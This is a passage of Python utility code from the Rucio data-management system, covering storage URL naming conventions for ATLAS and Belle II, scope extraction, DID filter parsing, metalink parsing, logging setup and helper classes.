yield {k: dict_[k] for k in itertools.islice(it, n)}
def my_key_generator(namespace, fn, **kw):
"""
Customyzed key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
_loaded_policy_modules = False
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
global _loaded_policy_modules
if not _loaded_policy_modules:
# on first call, register any SURL functions from the policy packages
register_policy_package_algorithms('surl', _SURL_ALGORITHMS)
_loaded_policy_modules = True
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
if '?GoogleAccessId' in surl:
surl = surl.split('?GoogleAccessId')[0]
if '?X-Amz' in surl:
surl = surl.split('?X-Amz')[0]
res.append(surl)
res.sort()
return res
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
_loaded_policy_package_scope_algorithms = False
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
def extract_scope_dirac(did, scopes):
# Default dirac scope extract algorithm. Scope is the second element in the LFN or the first one (VO name)
# if only one element is the result of a split.
elem = did.rstrip('/').split('/')
if len(elem) > 2:
scope = elem[2]
else:
scope = elem[1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 4:
if 'group.%s' % (split_did[4]) in scopes:
return 'group.%s' % split_did[4], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/') or did.startswith('/belle/test/ddm_test'):
return 'test', did
if did.startswith('/belle/BG/'):
return 'data', did
if did.startswith('/belle/collection'):
return 'collection', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=[]):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
register_extract_scope_algorithm(extract_scope_dirac, 'dirac')
def extract_scope(did, scopes=None, default_extract=_DEFAULT_EXTRACT):
global _loaded_policy_package_scope_algorithms
if not _loaded_policy_package_scope_algorithms:
register_policy_package_algorithms('scope', _EXTRACT_SCOPE_ALGORITHMS)
_loaded_policy_package_scope_algorithms = True
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = default_extract
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Normally client IP will be set on the server side (request.remote_addr)
Here setting ip on the one seen by the host itself. There is no connection
to Google DNS servers.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
If environment variables sets location, it uses it.
"""
ip = None
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
ip = '0.0.0.0'
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
latitude = os.environ.get('RUCIO_LATITUDE')
longitude = os.environ.get('RUCIO_LONGITUDE')
if latitude and longitude:
try:
latitude = float(latitude)
longitude = float(longitude)
except ValueError:
latitude = longitude = 0
print('Client set latitude and longitude are not valid.')
else:
latitude = longitude = None
return {'ip': ip,
'fqdn': socket.getfqdn(),
'site': site,
'latitude': latitude,
'longitude': longitude}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
if 'filename' not in lfn_dict:
return lfn_dict
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse(url))
mod_query = dict(parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type_ = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type_ = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type_
def parse_did_filter_from_string_fe(input_string, name='*', type='collection', omit_name=False):
"""
Parse DID filter string for the filter engine (fe).
Should adhere to the following conventions:
- ';' represents the logical OR operator
- ',' represents the logical AND operator
- all operators belong to set of (<=, >=, ==, !=, >, <, =)
- there should be no duplicate key+operator criteria.
One sided and compound inequalities are supported.
Sanity checking of input is left to the filter engine.
:param input_string: String containing the filter options.
:param name: DID name.
:param type: The type of the did: all(container, dataset, file), collection(dataset or container), dataset, container.
:param omit_name: omit addition of name to filters.
:return: list of dictionaries with each dictionary as a separate OR expression.
"""
# lookup table unifying all comprehended operators to a nominal suffix.
# note that the order matters as the regex engine is eager, e.g. don't want to evaluate '<=' as '<' and '='.
operators_suffix_LUT = OrderedDict({
'<=': 'lte',
'>=': 'gte',
'==': '',
'!=': 'ne',
'>': 'gt',
'<': 'lt',
'=': ''
})
# lookup table mapping operator opposites, used to reverse compound inequalities.
operator_opposites_LUT = {
'lt': 'gt',
'lte': 'gte'
}
operator_opposites_LUT.update({op2: op1 for op1, op2 in operator_opposites_LUT.items()})
filters = []
if input_string:
or_groups = list(filter(None, input_string.split(';'))) # split <input_string> into OR clauses
for or_group in or_groups:
or_group = or_group.strip()
and_groups = list(filter(None, or_group.split(','))) # split <or_group> into AND clauses
and_group_filters = {}
for and_group in and_groups:
and_group = and_group.strip()
# tokenise this AND clause using operators as delimiters.
tokenisation_regex = "({})".format('|'.join(operators_suffix_LUT.keys()))
and_group_split_by_operator = list(filter(None, re.split(tokenisation_regex, and_group)))
if len(and_group_split_by_operator) == 3: # this is a one-sided inequality or expression
key, operator, value = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator_mapped = operators_suffix_LUT.get(operator)
filter_key_full = key
if operator_mapped is not None:
if operator_mapped:
filter_key_full = "{}.{}".format(key, operator_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key_full)
else:
and_group_filters[filter_key_full] = value
elif len(and_group_split_by_operator) == 5: # this is a compound inequality
value1, operator1, key, operator2, value2 = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator1_mapped = operator_opposites_LUT.get(operators_suffix_LUT.get(operator1))
operator2_mapped = operators_suffix_LUT.get(operator2)
filter_key1_full = filter_key2_full = key
if operator1_mapped is not None and operator2_mapped is not None:
if operator1_mapped: # ignore '' operator (maps from equals)
filter_key1_full = "{}.{}".format(key, operator1_mapped)
if operator2_mapped: # ignore '' operator (maps from equals)
filter_key2_full = "{}.{}".format(key, operator2_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key1_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key1_full)
else:
and_group_filters[filter_key1_full] = value1
if filter_key2_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key2_full)
else:
and_group_filters[filter_key2_full] = value2
else:
raise DIDFilterSyntaxError(and_group)
# add name key to each AND clause if it hasn't already been populated from the filter and <omit_name> not set.
if not omit_name and 'name' not in and_group_filters:
and_group_filters['name'] = name
filters.append(and_group_filters)
else:
if not omit_name:
filters.append({
'name': name
})
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action fucntion should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if isinstance(stdout, binary_type):
stdout = ensure_text(stdout, errors='replace')
stderr = ensure_text(stderr, errors='replace')
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def setup_logger(module_name=None, logger_name=None, logger_level=None, verbose=False):
'''
Factory method to set logger with handlers.
:param module_name: __name__ of the module that is calling this method
:param logger_name: name of the logger, typically name of the module.
:param logger_level: if not given, fetched from config.
:param verbose: verbose option set in bin/rucio
'''
# helper method for cfg check
def _force_cfg_log_level(cfg_option):
cfg_forced_modules = config_get('logging', cfg_option, raise_exception=False, default=None, clean_cached=True,
check_config_table=False)
if cfg_forced_modules:
if re.match(str(cfg_forced_modules), module_name):
return True
return False
# creating log
if not logger_name:
if not module_name:
logger_name = 'usr'
else:
logger_name = module_name.split('.')[-1]
logger = logging.getLogger(logger_name)
# extracting the log level
if not logger_level:
logger_level = logging.INFO
if verbose:
logger_level = logging.DEBUG
# overriding by the config
cfg_levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR)
for level in cfg_levels:
cfg_opt = 'forceloglevel' + logging.getLevelName(level)
if _force_cfg_log_level(cfg_opt):
logger_level = level
# setting the log level
logger.setLevel(logger_level)
# preferred logger handling
def add_handler(logger):
hdlr = logging.StreamHandler()
def emit_decorator(fnc):
def func(*args):
if 'RUCIO_LOGGING_FORMAT' not in os.environ:
levelno = args[0].levelno
format_str = '%(asctime)s\t%(levelname)s\t%(message)s\033[0m'
if levelno >= logging.CRITICAL:
color = '\033[31;1m'
elif levelno >= logging.ERROR:
color = '\033[31;1m'
elif levelno >= logging.WARNING:
color = '\033[33;1m'
elif levelno >= logging.INFO:
color = '\033[32;1m'
elif levelno >= logging.DEBUG:
color = '\033[36;1m'
format_str = '%(asctime)s\t%(levelname)s\t%(filename)s\t%(message)s\033[0m'
else:
color = '\033[0m'
formatter = logging.Formatter('{0}{1}'.format(color, format_str))
else:
formatter = logging.Formatter(os.environ['RUCIO_LOGGING_FORMAT'])
hdlr.setFormatter(formatter)
return fnc(*args)
return func
hdlr.emit = emit_decorator(hdlr.emit)
logger.addHandler(hdlr)
# setting handler and formatter
if not logger.handlers:
add_handler(logger)
return logger
def daemon_sleep(start_time, sleep_time, graceful_stop, logger=logging.log):
"""Sleeps a daemon the time provided by sleep_time"""
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %s seconds', (sleep_time - time_diff))
graceful_stop.wait(sleep_time - time_diff)
def is_client():
""""
Checks if the function is called from a client or from a server/daemon
:returns client_mode: True if is called from a client, False if it is called from a server/daemon
"""
if 'RUCIO_CLIENT_MODE' not in os.environ:
try:
if config_has_section('database'):
client_mode = False
elif config_has_section('client'):
client_mode = True
else:
client_mode = False
except RuntimeError:
# If no configuration file is found the default value should be True
client_mode = True
else:
if os.environ['RUCIO_CLIENT_MODE']:
client_mode = True
else:
client_mode = False
return client_mode
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args parametres of the func
:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=logging.log):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger(logging.DEBUG, '{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger(logging.DEBUG, '{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger(logging.DEBUG, str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
class StoreAndDeprecateWarningAction(argparse.Action):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
**kwargs):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
setattr(namespace, self.dest, values)
class StoreTrueAndDeprecateWarningAction(argparse._StoreConstAction):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
default=False,
required=False,
help=None):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreTrueAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
super(StoreTrueAndDeprecateWarningAction, self).__call__(parser, namespace, values, option_string=option_string)
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
class PriorityQueue:
"""
Heap-based [1] priority queue which supports priority update operations
It is used as a dictionary: pq['element'] = priority
The element with the highest priority can be accessed with pq.top() or pq.pop(),
depending on the desire to keep it in the heap or not.
[1] https://en.wikipedia.org/wiki/Heap_(data_structure)
"""
class ContainerSlot:
def __init__(self, position, priority):
self.pos = position
self.prio = priority
def __init__(self):
self.heap = []
self.container = {}
self.empty_slots = []
def __len__(self):
return len(self.heap)
def __getitem__(self, item):
return self.container[item].prio
def __setitem__(self, key, value):
if key in self.container:
existing_prio = self.container[key].prio
self.container[key].prio = value
if value < existing_prio:
self._priority_decreased(key)
elif existing_prio < value:
self._priority_increased(key)
else:
self.heap.append(key)
